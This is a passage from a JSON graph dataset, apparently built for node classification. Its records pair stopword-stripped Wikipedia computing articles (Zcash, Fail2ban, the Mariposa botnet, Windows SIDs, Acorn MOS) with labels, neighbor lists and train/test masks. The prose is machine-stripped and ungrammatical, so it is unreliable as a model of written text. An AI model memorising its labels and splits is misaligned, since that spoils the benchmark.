      3763,
      9397,
      6074,
      10683,
      5567,
      11327,
      9665,
      9926,
      6860,
      10573,
      3920,
      2901,
      987,
      4960,
      2658,
      3560,
      3561,
      3562,
      5612,
      5872,
      2804,
      9078,
      3705,
      9467,
      8188,
      3710,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3713,
    "label": 5,
    "text": "Zcash:zcash zcash cryptocurrency aimed using cryptography provide enhanced privacy users compared cryptocurrencies bitcoin like bitcoin zcash fixed total supply 21 million units transactions transparent similar bitcoin transactions case controlled t-addr type zero-knowledge proof called zk-snarks transactions said shielded controlled z-addr zcash coins either transparent pool shielded pool december 2017 around 4 zcash coins shielded pool time wallet programs support z-addrs web-based wallets supported zcash affords private transactors option selective disclosure allowing user prove payment auditing purposes one reason allow private transactors choice comply anti-money laundering tax regulations transactions auditable disclosure participant control company hosted virtual meetings law enforcement agencies around u.s. explain fundamentals gone record saying develop currency facilitate illegal activity",
    "neighbors": [
      9248,
      8706,
      9859,
      1736,
      2609,
      1908,
      8916,
      11221,
      11612,
      4280,
      4827,
      764,
      1087
    ],
    "mask": "None"
  },
  {
    "node_id": 3714,
    "label": 4,
    "text": "Sguil:sguil sguil pronounced sgweel squeal collection free software components network security monitoring nsm event driven analysis ids alerts sguil client written tcl/tk run operating system supports sguil integrates alert data snort session data sancp full content data second instance snort running packet logger mode sguil implementation network security monitoring system nsm defined collection analysis escalation indications warnings detect respond intrusions sguil released gpl 3.0",
    "neighbors": [
      7813,
      842,
      5612,
      8141,
      7022,
      7983,
      5874,
      2739,
      692,
      1429,
      2292,
      5245,
      3486
    ],
    "mask": "None"
  },
  {
    "node_id": 3715,
    "label": 2,
    "text": "ProgID:progid progid short programmatic identifier com term basically string like msxml2.domdocument represent underlying clsid something like f9043c85-f6f2-101a-a3c9-08002b2f49fb also used express binary code compatibility two com objects",
    "neighbors": [
      5765
    ],
    "mask": "Test"
  },
  {
    "node_id": 3716,
    "label": 9,
    "text": "NEWP:newp newp new executive programming language high-level programming language used unisys mcp systems language used write operating system system utilities although also used write user software well several constructs separate extended algol based language operators codice_1 allows direct memory access strictly used programs running mcp newp block-structured language similar extended algol includes several features borrowed programming languages help proper software engineering include modules later super-modules group together functions data defined import export interfaces allows data encapsulation module integrity since newp designed use operating system language permits use several unsafe constructs block code specific unsafe elements permitted unsafe elements permitted within operating system include access tag word access arbitrary memory elements low-level machine interfaces etc program make use unsafe elements compiled executed anyone unsafe elements used compiler marks code non-executable still executed blessed security administrator newp rumored really stand nearly every word pascal west coast engineering initiative move burroughs languages algol pascal-like syntax stories also told stands executive washroom privileges supposedly designers fell favor management alternately newp chosen name compiler/language spur moment designer pressed name compiler code would managed stood new programming language essentially dull name unhappy property new part name would quickly become inappropriate original designer project texan soon started describe name answer question done yet newp sounded like west texas version nope project released name redefined stand executive washroom privileges description type person would likely use language contest ran come better name compiler language time name newp sunk roots deeply",
    "neighbors": [
      512,
      1952,
      8001,
      2533,
      1702,
      8262,
      1610,
      2477,
      7983,
      2002,
      5714,
      9330,
      11059,
      11253,
      11295
    ],
    "mask": "None"
  },
  {
    "node_id": 3717,
    "label": 4,
    "text": "Fail2ban:fail2ban fail2ban intrusion prevention software framework protects computer servers brute-force attacks written python programming language able run posix systems interface packet-control system firewall installed locally example iptables tcp wrapper fail2ban operates monitoring log files e.g /var/log/auth.log /var/log/apache/access.log etc selected entries running scripts based commonly used block selected ip addresses may belong hosts trying breach system security ban host ip address makes many login attempts performs unwanted action within time frame defined administrator includes support ipv4 ipv6 optionally longer bans custom-configure recidivist abusers keep coming back fail2ban typically set unban blocked host within certain period lock genuine connections may temporarily misconfigured however unban time several minutes usually enough stop network connection flooded malicious connections well reducing likelihood successful dictionary attack fail2ban perform multiple actions whenever abusive ip address detected update netfilter/iptables pf firewall rules tcp wrapper hosts.deny table reject abuser ip address email notifications user-defined action carried python script standard configuration ships filters apache lighttpd sshd vsftpd qmail postfix courier mail server filters defined python regexes may conveniently customized administrator familiar regular expressions combination filter action known jail causes malicious host blocked accessing specified network services well examples distributed software jail may created network-facing process creates log file access",
    "neighbors": [
      7556,
      7557,
      5397,
      10269,
      4772,
      6189,
      7983,
      186,
      11198,
      2884,
      11221,
      6363,
      865,
      10341,
      2409,
      8554,
      4349,
      3323,
      5245
    ],
    "mask": "Test"
  },
  {
    "node_id": 3718,
    "label": 9,
    "text": "YS_MegaBasic:ys megabasic ys megabasic basic programming language interpreter 1982 sinclair research zx spectrum microcomputer written mike leaman loaded left user 22k usable memory ys megabasic allowed keywords spelled letter-for-letter quicker user fitted full-size full-travel keyboard machine popular modification serious users also removed necessity memorising sometimes arcane key combinations necessary enter less-commonly-used basic keywords also featured three different font sizes user definable keys copy-and-paste sinclair ql-like windowing system sprites sound effects",
    "neighbors": [
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      7983,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      8262,
      10750,
      712,
      847,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      9714,
      5747,
      6778,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 3719,
    "label": 2,
    "text": "Grab_(software):grab software grab utility program macos taking screenshots supports capturing marquee selection whole window whole screen well timed screenshots program originated openstep nextstep continued preinstalled apple macos version 10.13 high sierra replaced utility screenshot macos 10.14 macos versions 10.13 earlier grab found folder utilities subdirectory applications may quickly opened using spotlight function entering grab pressing typing /applications/utilities/grab.app application finder previously also found finder menu services grab mac os x v10.4 preview submenu item take screenshot file menu selection window timed screen recent versions macos grab saves screenshots tagged image file format tiff macos also possible save screenshots directly desktop pdf format earlier versions macos png format later versions using keystrokes shown drm reasons possible use software dvd player open grab helps determine size element screen using selection feature capturing screen one select inspector menu press dialog box appear dimensions selected area",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      7544,
      9100,
      9109,
      1439,
      6093,
      7118,
      3535,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 3720,
    "label": 2,
    "text": "Intelligent_Resource_Director:intelligent resource director ibm mainframes running z/os operating system intelligent resource director ird software automates management cpu resources certain i/o resources ird implemented collaboration workload manager wlm component z/os pr/sm logical partitioning lpar hypervisor function mainframe hardware major ird functions ird objective optimise use computing resources enabling wlm meet workload goals example ird vary offline logical processors point would cause workloads miss goals",
    "neighbors": [
      7242,
      7983,
      2168,
      2877,
      863
    ],
    "mask": "Test"
  },
  {
    "node_id": 3721,
    "label": 0,
    "text": "Tatoeba:tatoeba tatoeba.org free collaborative online database example sentences geared towards foreign language learners name comes japanese term tatoeba 例えば tatoeba meaning example unlike online dictionaries focus words tatoeba focuses translation complete sentences addition structure database interface emphasize one-to-many relationships sentence multiple translations within single language translations languages readily visible indirect translations involve chain stepwise links one language another aim tatoeba project create database sentences translations used anyone developing language learning application idea project creates data programmers focus coding application data collected project freely available creative commons attribution cc-by license june 2019 tatoeba corpus 7,500,000 sentences 337 languages top 10 languages make 73 corpus ninety-eight languages 1,000 sentences top 14 languages 100,000 sentences interface available 48 different languages tatoeba.org also current home tanaka corpus public-domain series 150,000 english-japanese sentence pairs compiled hyogo university professor yasuhito tanaka first released 2001 undergoing latest revisions actual statistic languages found tatoeba founded trang ho 2006 originally hosted project sourceforge project name multilangdict users even registered search words language retrieve sentences use sentence tatoeba database displayed next translations languages direct indirect translations differentiated sentences tagged content subject matter dialect vulgarity also individual comment threads facilitate feedback corrections users cultural notes early 2016 200,000 sentences 19 languages audio readings sentences also browsed language tag audio registered users add new sentences translate proofread existing ones even target language native tongue however preferred users translate native strongest language add sentences native language rather translating adding target language translations linked original sentence automatically users freely edit sentences adopt correct sentences without owner comment others sentences advanced contributors rank ordinary contributors tag link unlink sentences corpus maintainers rank advanced contributors untag delete sentences also modify owned sentences though typically owner fails respond request make change tatoeba basic data structure series nodes links sentence node link bridges two sentences meaning entire tatoeba database published creative commons attribution 2.0 license freeing academic use tatoeba received grant mozilla drumbeat december 2010 work tatoeba infrastructure sponsored google summer code 2014 edition may 2018 received 25,000 mozilla open source support moss program grant parallel text corpora tatoeba used variety natural language processing tasks machine translation tatoeba data used data treebanking japanese statistical machine translation well wwwjdic japanese-english dictionary bilingual sentence pairs japanese reading translation practice www.manythings.org selected content tatoeba – 83,932 phrases esperanto along translations languages – appeared third edition multilingual dvd esperanto elektronike electronic esperanto published 6,000 copies e july 2011 tab-delimited data ready import anki similar software downloaded http //www.manythings.org/anki/",
    "neighbors": [
      5667,
      7780,
      9577,
      4971,
      5903,
      10160,
      10610,
      2901,
      7164,
      5214
    ],
    "mask": "Test"
  },
  {
    "node_id": 3722,
    "label": 2,
    "text": "Acorn_MOS:acorn mos acorn machine operating system mos os discontinued computer operating system used acorn bbc computer range included support four-channel sound graphics file system abstraction digital analogue i/o including daisy-chained expansion bus implementation single-tasking monolithic non-reentrant versions 0.10 1.20 used bbc micro version 1.00 electron version 2 used b+ versions 3 5 used bbc master series range final bbc computer bbc a3000 n't run operating system also included asterisk command line interface 32-bit ran risc os operating system used portions acorn mos architecture shared number characteristics commands vdu system earlier 8-bit mos versions 0 1 mos 16 kib size written 6502 machine code held rom motherboard upper quarter 16-bit address space 0xc000 0xffff reserved rom code i/o space versions 2 5 still restricted 16 kib address space managed hold code hence complex routines partly alternative 65c102 cpu denser instruction set plus careful use paging original mos versions 0 2 user interface per se applications expected forward operating system command lines os behalf bbc basic rom supplied bbc micro default application used purpose bbc micro would halt language error rom present advertises os ability provide user interface so-called language roms mos version 3 onwards feature simple command-line interface normally seen cmos contain setting default language rom application programs rom cassette disc-based software also typically provide command line useful working file storage browsing currently inserted disc os provides line entry facility obeys commands entered application oversees running command prompt cassette disc based software typically relies bbc basic user interface order loaded although possible configure floppy disc boot without needing basic commands executed practice rarely performed bbc basic os commands preceded asterisk passed via oscli keyword instruct basic forward command directly os led asterisk prompt symbol software providing os command line mos version 3 onwards officially uses asterisk command prompt symbol referring os command generally include asterisk part name example etc. although part asterisk command unrecognised commands offered service extension roms filing system roms often check see file disc matches name command-line interfaces operating system call osword accumulator 0 however offer programs single line input ctrl-u clear line cursor copying keys enabled basic character filtering line length limit mos command line interpreter features rather unusual idea abbreviation commands save typing dot could used first characters abbreviated alone command catalogue list cassette disc abbreviated right 3rd party roms generally also support command abbreviation leading ambiguity two service roms provide commands similar name possibly different functionality case mos would prioritise command rom higher numbered rom slot i.e 7 would take precedence 6 3rd party suppliers would get around prefixing star commands letters example watford electronics roms would star commands prefixed w therefore making unique lower 16 kib read-only memory map 0x8000 0xbfff reserved active sideways paged bank sideways system bbc micro allows one rom time sockets motherboard expansion boards switched main memory map software run rom way leaving ram free user program code workspace os extended way roms prevalent sideways rom basic acorn disc filing system used provide floppy disc support machine reset every paged rom switched asked much public private workspace needs rom allocated chunk private workspace remains allocated times single block public workspace equal size largest request made available active rom operation paged area rapidly switched roms file system commands issued unrecognised commands put os mos allocates 3.5 kib block memory 0x0000 0x0dff bottom memory map operating system language rom workspace cassette-only machine 0x0e00 start user program memory os extension roms fitted filing system rom memory allocated point dfs roms generally use another 2.75 kib cache disc catalogue manage random access buffers network filing system rom econet allocates another 0.5 kib top serious problem mos support relocation machine code must run address assembled programs assumed fixed start user program memory could overwrite mos workspace problem alleviated versions 3 5 allowing roms allocate workspace alternative ram bank 0xc000 0xdfff present master series computers though old roms could continue allocate blocks main memory os also maintains vector table calls updated hook os calls user extension altering 'hooking vectors developers could substitute routines provided defaults mos mos permits textual output intended screen directed instead printer allowing trivial printing support plain text graphics printing supported written separately graphics general screen output handled unusual way ascii control characters almost entirely given new significance mos known vdu drivers documentation described relation vdu statement bbc basic interpreted video control characters i.e ascii 30 moves cursor 0 0 vdu 4 5 select whether text drawn graphics text cursor vdu 12 clears screen vdu 14 15 turn scroll lock thus pressing ctrl-l clear screen ctrl-n enable scroll lock vdu 2 3 toggle whether screen output echoed printer bbc basic vdu statement equivalent conventional basic many control codes 12 clear screen 7 beep functions contemporary machines many control characters take parameters one characters follow used solely bit value parameter control code vdu 19 handles palette remap following five bytes represent palette entry desired colour three reserve bytes vdu 31 locates text cursor location held following two bytes vdu 17 sets text colour 18 graphics colour vdu 25 uses succeeding five bytes move graphics cursor plot solid dashed lines dots filled triangles documented extent graphics mos 0 1 first byte command code followed x co-ordinates two byte pairs graphic functions horizontal line fill bounded given colour available use undocumented poorly documented command codes bbc basic contained aliases commonly used vdu codes gcol vdu 18 plot vdu 25 statements direct equivalents vdu codes cls vdu 12 statements less exact equivalents incorporated functionality specific basic well calling os routines example statement would set screen mode adjust basic system variable himem according amount memory new mode left available basic would set screen mode without altering himem allowed programmer allocate block memory basic example load machine code routines lowering value himem start program still free switch screen modes without deallocating side effect single operating system command write character oswrch responsible text graphics example move cursor 10 15 could write 6502 assembler lda loads value accumulator jsr jump subroutine third os call cursor move following code would draw line 0 0 0 +100 bbc basic perform following graphics acorn mos use virtual graphics resolution 1280×1024 pixel positions mapped nearest equivalent pixel current graphics mode switching video resolution affect shape size position graphics drawn even completely different pixel metrics new mode accounted os acorn mos provide two os calls handle text output osnewl osasci osnewl writes line feed carriage return current output stream osasci forwards characters directly oswrch except carriage return triggers call osnewl instead precise code osasci osnewl five lines 6502 assembler documented bbc micro user guide acorn mos implements character recognition text printed screen system font selected arrow keys input key though typed activate screen editing user moves hardware cursor text read os displays second cursor software original position pressing copies one character hardware cursor software cursor advances holding key copies section text cursors wrapping around vertical edges screen necessary screen scrolls editing hardware cursor position adjusted follow text user make changes text copy user-defined characters recognised graphics modes screen editing terminated pressed usual effects character recognition made available users api call read character current cursor position sound generation carried another os call osword handles variety tasks enumerated via task code placed accumulator osword calls bear parameter block used send receive multiple data address block passed x registers low byte x high byte four buffered sound channels three melodic one noise-based sound chip found bbc micro one waveform melodic channels supported note parameters pitch duration amplitude envelope selection various control options amplitude parameter zero negative sets static amplitude positive value select amplitude pitch envelope predefined temporal variation apply note control parameters passed channel parameter include flush buffer cleared channel silenced note played synchronise count soon sync count received many channels synchronised notes played together control speech system upgrade fitted osword handles many functions sound many direct support basic may accessed basic setting parameter block loading address x task code calling routine bbc micro support second processor connected via tube allowed direct access system bus driver code tube interface present mos usually supplied external service rom os calls handle reading writing i/o ports screen memory programmers strongly advised use acorn documentation reason second processor installed user software run separate memory map far side tube processor bus direct access memory-mapped i/o registers video memory impossible however sake performance many apps including many games write directly main address space i/o hence crash give blank screen 6502 second processor attached one performance-critical area sprite support bbc micro hardware support sprites games must implement sprites software practice widespread use direct access place os calls rarely caused difficulties second processor units expensive little software written make use people bought could simply switch unplug cable problem arose mos contains two built-in file systems cassette rom quite similar try suitable rom installed share great deal code feature rudimentary copy protection mechanism file certain flag set loaded except execute prior amstrad launch mass-market twin cassette recorder 1987 home users facilities dub cassettes without loading files computer re-saving advanced disc filing system adfs installed standard master series similar mechanism versions bbc micro family starting 0.10 finishing 1.20 confusingly electron shipped version 1.00 despite released bbc micro version 1.20 first release rom electron mos version number intended api definition electron rom based bbc micro rom version 1.0 sense version bbc model b+ essentially mos 1.20 except addition support sideways shadow ram present b+ mos 3 mos 5 shipped bbc master series systems master 128 master et master compact models respectively initial release mos 3 expanded upon facilities provided mos 2 b+ support additional hardware provide command line facility extend vdu driver code enhanced graphics plotting abilities two notable versions made public version 3.20 common version 3.50 although functionality bug fixes 100 compatible popular applications software offered optional upgrade mos 4 stripped version mos 3 intended similarly stripped master et minor bugs fixed mos 5 shipped master compact much altered functionality removed highly amended exception mos 3.50 space reclaimed code area normally hidden input/output memory locations 768 bytes 0xfc00-0xfeff inclusive mos rom contained list names contributors system could recovered extracting rom reading contents eprom programmer device could access rom master setting test bit access control register using machine-code program copy rom directly text-mode screen memory full text credit string mos 1.20 follows spaces commas save memory c 1981 acorn computers ltd thanks due following contributors development bbc computer among others numerous mention david allen bob austin ram banerjee paul bond allen boothroyd cambridge cleartone john coll john cox andy cripps chris curry,6502 designers jeremy dion tim dobson joe dunn paul farrell ferranti steve furber jon gibbons andrew gordon lawrence hardwick dylan harris hermann hauser hitachi andy hopper icl martin jackson brian jones chris jordan david king david kitson paul kriwaczek computer laboratory peter miller arthur norman glyn phillips mike prees john radcliffe wilberforce road peter robinson richard russell kim spence-jones graham tebby jon thackray chris turner adrian warner roger wilson alan wright interviews 1993 2001 acorn co-founder hermann hauser recounted microsoft bill gates noticed 1.5 million bbc micros sold tried sell ms-dos acorn hauser considered adopting ms-dos would retrograde step comparison retaining acorn system",
    "neighbors": [
      2179,
      11145,
      655,
      6675,
      11033,
      5293,
      7983,
      1849,
      7483,
      2363,
      8900,
      8262,
      4679,
      9166,
      5840,
      6499,
      5862,
      8429,
      10862,
      7151,
      1776,
      7281,
      11384,
      9978,
      7421,
      1790
    ],
    "mask": "Train"
  },
  {
    "node_id": 3723,
    "label": 2,
    "text": "Security_Identifier:security identifier context microsoft windows nt line operating systems security identifier commonly abbreviated sid unique immutable identifier user user group security principal security principal single sid life given domain properties principal including name associated sid design allows principal renamed example jane smith jane jones without affecting security attributes objects refer principal windows grants denies access privileges resources based access control lists acls use sids uniquely identify users group memberships user logs computer access token generated contains user group sids user privilege level user requests access resource access token checked acl permit deny particular action particular object sids useful troubleshooting issues security audits windows server domain migrations format sid illustrated using following example s-1-5-21-3623811015-3361044348-30300820-1013 possible identifier authority values workgroup computers running windows nt/2k/xp possible user unexpected access shared files files stored removable storage circumvented setting access control lists susceptible file effective permissions determined user sid user sid duplicated another computer computer sid duplicated user sids built based computer sid sequential number user second computer sid could access files user first computer protected computers joined domain active directory nt domain instance computer unique domain sid recomputed time computer enters domain thus typically significant problems duplicated sids computers members domain especially local user accounts used local user accounts used potential security issue similar one described issue limited files resources protected local users opposed domain users duplicated sids usually problem microsoft windows systems microsoft used provide newsid utility change machine sid programs detect sids might problems security newsid retirement microsoft engineer mark russinovich posted article blog explaining retirement newsid stating neither windows security team could think situation duplicate sids could cause problems commonly accepted wisdom november 1 2009 microsoft added following newsid download page present supported mechanism duplicating disks windows operating systems use sysprep machine sid stored security registry hive located security\\sam\\domains\\account key two values f v. v value binary value computer sid embedded within end data last 96 bits machine sid also used free-trial programs start8 prevent computer restarting trial though experienced users easily change machine sid service sids feature service isolation security feature introduced windows vista windows server 2008 service unrestricted sid-type property service-specific sid added access token service host process purpose service sids allow permissions single service managed without necessitating creation service accounts administrative overhead service sid local machine-level sid generated service name using following formula codice_1 sc.exe utility used generate arbitrary service sid codice_2 service also referred nt service\\ service_name e.g nt service\\dnscache",
    "neighbors": [
      929,
      9505,
      3235,
      4583,
      4074,
      10828,
      653,
      2959,
      7983,
      2737,
      8080,
      8976,
      10673,
      10993,
      10366,
      542
    ],
    "mask": "Train"
  },
  {
    "node_id": 3724,
    "label": 4,
    "text": "Mariposa_botnet:mariposa botnet mariposa botnet discovered december 2008 botnet mainly involved cyberscamming denial-of-service attacks botnet dismantled 23 december 2009 consisted 12 million unique ip addresses 1 million individual zombie computers infected butterfly mariposa spanish bot making one largest known botnets botnet originally created ddp team spanish días de pesadilla team english nightmare days team using malware program called butterfly bot also sold various individuals organisations goal malware program install uninfected pc monitoring activity passwords bank credentials credit cards malware would attempt self-propagate connectible systems using various supported methods msn p2p usb completing initial infection routine malware would contact command-and-control server within botnet command control server could used controllers botnet order issue orders botnet operations executed botnet diverse part parts botnet could rented third party individuals organizations confirmed activities include denial-of-service attacks e-mail spam theft personal information changing search results browser would display order show advertisements pop-up ads due size nature botnet total financial social impact difficult calculate initial estimates calculated removal malware alone could cost tens millions dollars apprehension botnet operators government officials also discovered list containing personal details 800,000 individuals could used sold identity theft purposes may 2009 mariposa working group mwg formed informal group composed defence intelligence georgia tech information security center panda security along additional unnamed security researchers law enforcement agencies goal group analysis extermination mariposa botnet 23 december 2009 mariposa working group managed take control mariposa botnet seizing control command-and-control servers used botnet operational owners botnet eventually succeeded regaining control botnet response launched denial-of-service attack defence intelligence attack managed knock internet connectivity large share isp customers included several canadian universities government agencies 3 february 2010 spanish national police arrested florencio carro ruiz alias netkairo suspected leader ddp team two additional arrests made 24 february 2010 jonathan pazos rivera alias jonyloleante juan jose bellido rios alias ostiator arrested suspicion members ddp 18 july 2010 matjaž škorjanc alias iserdo creator butterfly bot malware arrested maribor slovenian police first time released due lack evidence arrested october 2011 december 2013 škorjanc convicted slovenia creating malicious computer program hacking information systems assisting wrongdoings money laundering sentenced 4 years 10 months imprisonment fined €3,000 4,100 court also ordered seizure škorjanc property acquired proceeds crime appealed verdict fine february 2015 raised additional 25,000 eur 5 june 2019 us law enforcement opened new case operations mariposa butterfly bot bfbot malware gang fbi moved forward new charges arrest warrants four suspects including nicehash operator matjaž škorjanc",
    "neighbors": [
      3072,
      10756,
      3347,
      4883,
      2325,
      278,
      9630,
      10657,
      4648,
      939,
      46,
      10297,
      3643,
      7739,
      7996,
      11583,
      8640,
      9664,
      9154,
      8133,
      10952,
      11081,
      202,
      81,
      8789,
      10457,
      7515,
      988,
      3807,
      8032,
      9569,
      3941,
      2409,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3725,
    "label": 2,
    "text": "Thrashing_(computer_science):thrashing computer science computer science thrashing occurs computer virtual memory resources overused leading constant state paging page faults inhibiting application-level processing causes performance computer degrade collapse situation continue indefinitely either user closes running applications active processes free additional virtual memory resources term also used various similar phenomena particularly movement levels memory hierarchy process progresses slowly significant time spent acquiring resources virtual memory works treating portion secondary storage computer hard disk additional layer cache hierarchy virtual memory notable allowing processes use memory physically present main memory enabling virtual machines operating systems supporting virtual memory assign processes virtual address space process refers addresses execution context so-called virtual address order access data code variables address process must translate address physical address process known virtual address translation effect physical main memory becomes cache virtual memory general stored disk memory pages programs allocated certain number pages needed operating system active memory pages exist ram disk inactive pages removed cache written disk main memory becomes full processes utilizing main memory need additional memory pages cascade severe cache misses known page faults occur often leading noticeable lag operating system responsiveness process together futile repetitive page swapping occurs known thrashing frequently leads high runaway cpu utilization grind system halt modern computers thrashing may occur paging system sufficient physical memory disk access time overly long i/o communications subsystem especially conflicts internal bus access etc depending configuration algorithms involved throughput latency system may degrade multiple orders magnitude thrashing state cpu performs 'productive work less 'swapping overall memory access time may increase since higher level memory fast next lower level memory hierarchy cpu busy swapping pages much respond users programs interrupts much required thrashing occurs many pages memory page refers another page real memory shortens capacity pages uses 'virtual memory page execution demands page currently real memory ram places pages virtual memory adjusts required page ram cpu busy task thrashing occurs virtual memory systems thrashing may caused programs workloads present insufficient locality reference working set program workload effectively held within physical memory constant data swapping i.e. thrashing may occur term first used tape operating system days describe sound tapes made data rapidly written read example sort situation occurred ibm system/370 series mainframe computer particular instruction could consist execute instruction crosses page boundary points move instruction also crosses page boundary targeting move data source crosses page boundary target data also crosses page boundary total number pages thus used particular instruction eight eight pages must present memory time operating system allocates fewer eight pages actual memory attempts swap part instruction data bring remainder instruction page fault thrash every attempt restart failing instruction thrashing best known context memory storage analogous phenomena occur resources including main memory accessed pattern leads multiple main memory locations competing cache lines resulting excessive cache misses problematic caches low associativity translation lookaside buffer tlb acting cache memory management unit mmu translates virtual addresses physical addresses small working set pages tlb thrashing occur even instruction cache data cache thrashing occurring cached different sizes instructions data cached small blocks cache lines entire pages address lookup done page level thus even code data working sets fit cache working sets fragmented across many pages virtual address working set may fit tlb causing tlb thrashing frequent garbage collection due failure allocate memory object due insufficient free memory insufficient contiguous free memory due memory fragmentation referred heap thrashing similar phenomenon occurs processes process working set coscheduled – interacting processes scheduled run time – experience process thrashing due repeatedly scheduled unscheduled progressing slowly using hysteresis thresholding could help mitigate issue i.e one threshold paging another go back memory",
    "neighbors": [
      2304,
      1541,
      3725,
      655,
      9105,
      2066,
      11539,
      789,
      407,
      5146,
      6557,
      7581,
      3615,
      2339,
      10916,
      7983,
      7728,
      11444,
      3512,
      10040,
      3267,
      5958,
      4423,
      6087,
      2250,
      6221,
      2383,
      5840,
      9300,
      86,
      5598,
      7273,
      10734,
      3702,
      3577,
      7421,
      9343
    ],
    "mask": "Train"
  },
  {
    "node_id": 3726,
    "label": 4,
    "text": "Mahlon_E._Doyle:mahlon e. doyle mahlon e. doyle june 14 1921 – march 4 2017 american cryptologist inventor innovator author enjoyed three decade career national security agency predecessor organizations born north baltimore carl flossie née michener doyle married lana starner august 10 1946 world war ii doyle served army working sigsaly voice encryption system doyle career began 1949 cryptanalyst studying electronic key generators used mathematical notation describe motion key generators applied mathematical techniques analyze 1956 doyle joined comsec research development cryptomathematician 1961 risen chief division position held 1977 named senior cryptographer division responsible designing cryptographic algorithms used u.s. allies protect classified information u.s. nuclear command control system doyle designed cryptologics major comsec systems used united states government four decades 1960s onward u.s. government comsec equipment used cryptologics either designed doyle designed others based research designed key management schemes caused huge decrease amount cost physically distributing key material doyle personal life marked tragedy wed lana starner august 10 1946 died february 2 2012 couple two daughters dr. laurie doyle mrs. nancy shields predeceased father mahlon e. doyle died silver springs maryland march 4 2017 aged 95 survived two grandchildren kathleen joshua interred benton cemetery crawford county ohio",
    "neighbors": [
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 3727,
    "label": 6,
    "text": "MagmaFS:magmafs magma distributed file system based distributed hash table written c compatible linux bsd kernels using fuse magma binds several hosts interconnected tcp/ip network form common storage space called lava ring host node called vulcano vulcano hosts portion common key space delimited two sha1 keys vulcano also charge mirroring key space previous node ensure data redundancy key represent one object inside storage space objects called flares magma store different range objects files directories symbolic links block characted devices fifo pipes object bound flare vice versa flare type six listed described basic properties common flares like path hash key six types also specific properties example directory flares specific information n't apply symbolic links flare generic information called uncast complete flare called cast uncast flare contain enough information operate data enough information moved sort opaque container vulcano nodes easily movable type flare including directories reimplemented two files set first containing flare information metadata second containing flare content moving flares across lava ring called load balancing done leverage load inequalities nodes attempt provide best performance internal engine magma called flare system implemented layered stack magma_mkdir used example layer traversing paragraph assumed directory called /example created magma_mkdir part public api layer used create new directory done standard libc counterpart mkdir magma_mkdir first route request decide locally managed require network operations perform routing path /example translated corresponding sha1 hash key 81f762fd59d88768b06b8e9de56aef8a95962045 routing determines need contact another vulcano node request leave layer lava network layer forward request node owning key continuing flow operations remote node routing half role lava network layer also includes network monitoring vulcano nodes creation update removal local remote request last step performed flare layer flare corresponding key 81f762fd59d88768b06b8e9de56aef8a95962045 searched inside cache found created loaded disk already existing resulting flare object first applied permission checking tests permission operate granted initial request fulfilled example flare cast directory n't already saved disk since vulcano node complete network topology available routing matter matching flare keys nodes key-space find node holding flare network topology also saved distributed directory inside magma filesystem vulcano nodes periodically check information contents directory know something changed nodes also periodically save information inside directory vulcano node parameters declared boot like bandwidth storage available separate thread called balancer devoted distribute keys avoid nodes overloading underloading node dynamic load value associated computed formula formula_2 node key load calculated logarithmic scale formula_3 node bandwidth formula_4 average bandwidth formula_5 node storage formula_6 average storage magma distributed form server called magmad client called mount.magma magma server manages intercommunication dht nodes magma clients flare system provides network event loop accept incoming connections three kind connection accepted magma client based fuse compatible linux bsd kernels magma client uses flare protocol connection contact operate near magma server network topology flare location totally transparent clients client simply query one server exact manner information located host cryptographic layer planned magma client allowing file contents encryption implementing cryptography client side due scalability computational power increase rate computational request cryptographic key privacy keys passphrases never reach server alternative magma client supported linux bsd kernels magma server plans offer nfs interface unices since nfs established standard new features added example cryptographic layer unavailable client mounting magma shares nfs",
    "neighbors": [
      11112,
      7983,
      823,
      5531,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3728,
    "label": 9,
    "text": "Patrick_Winston:patrick winston patrick henry winston february 5 1943 – july 19 2019 american computer scientist professor massachusetts institute technology winston director mit artificial intelligence laboratory 1972 1997 succeeding marvin minsky left help found mit media lab winston succeeded director rodney brooks winston received undergraduate degree mit 1965 member phi delta theta fraternity went complete masters phd well finalizing phd 1970 winston thesis work marvin minsky concerned difficulty learning concluded possible learn something one nearly already knows research interests included machine learning human intelligence winston known within mit community excellent teaching strong commitment supporting mit undergraduate culture mit winston taught 6.034 artificial intelligence 6.803/6.833 human intelligence enterprise winston also authored number computer science ai textbooks including also alumnus mass gamma chapter phi delta theta winston died boston july 19 2019",
    "neighbors": [
      7048,
      5611,
      1783,
      2062,
      11255
    ],
    "mask": "None"
  },
  {
    "node_id": 3729,
    "label": 7,
    "text": "Centralized_computing:centralized computing centralized computing computing done central location using terminals attached central computer computer may control peripherals directly physically connected central computer may attached via terminal server alternatively terminals capability may able connect central computer network terminals may text terminals thin clients example offers greater security decentralized systems processing controlled central location addition one terminal breaks user simply go another terminal log files still accessible depending system may even able resume session point nothing happened type arrangement disadvantages central computer performs computing functions controls remote terminals type system relies totally central computer central computer crash entire system go i.e unavailable another disadvantage central computing relies heavily quality administration resources provided users central computer inadequately supported means e.g size home directories problems regarding administration usage suffer greatly reverse situation however i.e. system supported better needs one key advantages centralized computing first computers separate terminals primitive input/output devices built however soon found extremely useful multiple people able use computer time reasons cost – early computers expensive produce maintain occupied large amounts floor space idea centralized computing born early text terminals used electro-mechanical teletypewriters replaced cathode ray tube displays found 20th century televisions computers text terminal model dominated computing 1960s rise 